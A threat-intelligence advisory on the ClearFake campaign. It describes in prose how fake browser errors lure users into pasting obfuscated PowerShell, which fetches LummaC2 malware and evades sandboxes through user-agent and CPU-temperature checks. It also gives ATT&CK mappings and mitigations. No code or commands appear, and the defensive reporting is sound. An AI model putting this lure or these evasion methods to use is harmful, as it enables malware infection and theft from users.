EXECUTIVE SUMMARY :
A new campaign from the JavaScript framework "ClearFake" has been observed employing novel execution techniques to deceive users into manually executing malicious PowerShell code. Unlike traditional drive-by downloads, where users are tricked into downloading and running malicious payloads, this campaign relies on social engineering to prompt users to copy and paste malicious code directly into their PowerShell terminal. This method aims to evade detection by security tools, as the malicious commands are executed manually by the user rather than being initiated by a downloaded script file.
The attack begins with users visiting compromised websites that display a fake browser error message, instructing them to install a root certificate to fix the issue. Upon clicking the "Fix it" button, users are presented with instructions to copy obfuscated PowerShell code into their clipboard and execute it in a PowerShell terminal. This PowerShell script performs several actions: it clears the DNS cache, displays a success message box, downloads additional PowerShell code from an attacker-controlled domain, and ultimately installs the LummaC2 malware via a series of steps involving base64-encoded commands and sandbox evasion techniques. Notably, the script uses a user agent check and a CPU temperature check to avoid detection in virtualized environments.
To mitigate this threat, organizations should implement robust application control policies to restrict PowerShell usage to essential personnel only. It is crucial to educate users about the risks of executing code from untrusted sources and to enhance network defenses by blocking access to suspicious domains. Additionally, configuring Windows Defender Application Control (WDAC) to enforce constrained language mode for PowerShell and ensuring endpoint security tools are integrated with the Windows Antimalware Scan Interface (AMSI) can provide significant protection. By adopting these best practices, organizations can effectively reduce the risk posed by this emerging threat and safeguard their environments against similar attacks.
THREAT PROFILE :
Tactic | Technique Id | Technique |
Execution | T1059 | Command and Scripting Interpreter |
Persistence | T1547 | Boot or Logon Autostart Execution |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
T1218 | System Binary Proxy Execution | |
T1070 | Indicator Removal | |
Collection | T1113 | Screen Capture |
Command and Control | T1071 | Application Layer Protocol |
Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-javascript-framework-trick-users/